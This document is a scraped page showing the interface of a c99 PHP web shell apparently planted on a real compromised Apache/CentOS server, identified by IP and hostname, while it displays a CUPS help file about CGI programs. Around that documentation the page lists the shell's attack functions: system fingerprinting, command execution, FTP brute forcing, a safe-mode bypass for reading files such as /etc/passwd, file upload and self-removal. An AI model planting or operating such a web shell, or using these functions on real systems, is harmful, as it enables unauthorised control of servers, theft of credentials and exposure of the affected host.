110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/cups-1.3.7/help/ drwxr-xr-x Free 50.95 GB of 127.8 GB (39.87%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/share/doc/cups-1.3.7/help/ drwxr-xr-x
Free 50.95 GB of 127.8 GB (39.87%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: cgi.html (2.48 KB) -rw-r--r--
Select action/file-type:
(+) |

(+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Using CGI Programs

CUPS has traditionally provided a dynamic web interface through dedicated CGI programs that are executed when users open special directories on the CUPS server. Each CGI performs administration, class, help, job, and printer functions as directed by the user, but the actual programs that are run and functions that are available are limited to those that were originally designed into the scheduler.

Support is now available for CGI programs and specific scripting languages, currently Java, Perl, PHP, and Python. The interpreters for these languages are currently configured at compile time. Future versions may expand the interface to allow for generic support of scripting languages similar to the Apache "AddHandler" directive, but with external programs instead of modules.

Table 1 shows the MIME media types that are reserved for the CGI support in CUPS. The names have been chosen to mirror those used by Apache:

Table 1: CGI MIME Media Types
MIME Media Type	Description
application/x-httpd-cgi	CGI script/program
application/x-httpd-java	Java program
application/x-httpd-perl	Perl script
application/x-httpd-php	PHP script
application/x-httpd-python	Python script

Configuring the Server

In order to enable the corresponding type, you must create a new /etc/cups/cgi.types file which maps the filename extensions to the appropriate MIME type, for example:

application/x-httpd-cgi cgi
application/x-httpd-java class
application/x-httpd-perl pl
application/x-httpd-php php
application/x-httpd-python py

CGI scripts/programs (application/x-httpd-cgi) also must have execution permissions to be treated as a CGI script or program.

Limitations

CUPS implements most of the CGI/1.1 specification, with the following exceptions:

No PATH_INFO or PATH_TRANSLATED support
Limited HTTP field support; only the Content-Length (CONTENT_LENGTH), Cookie (HTTP_COOKIE), and User-Agent (HTTP_USER_AGENT) fields are placed in environment variables at this time

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0173 ]--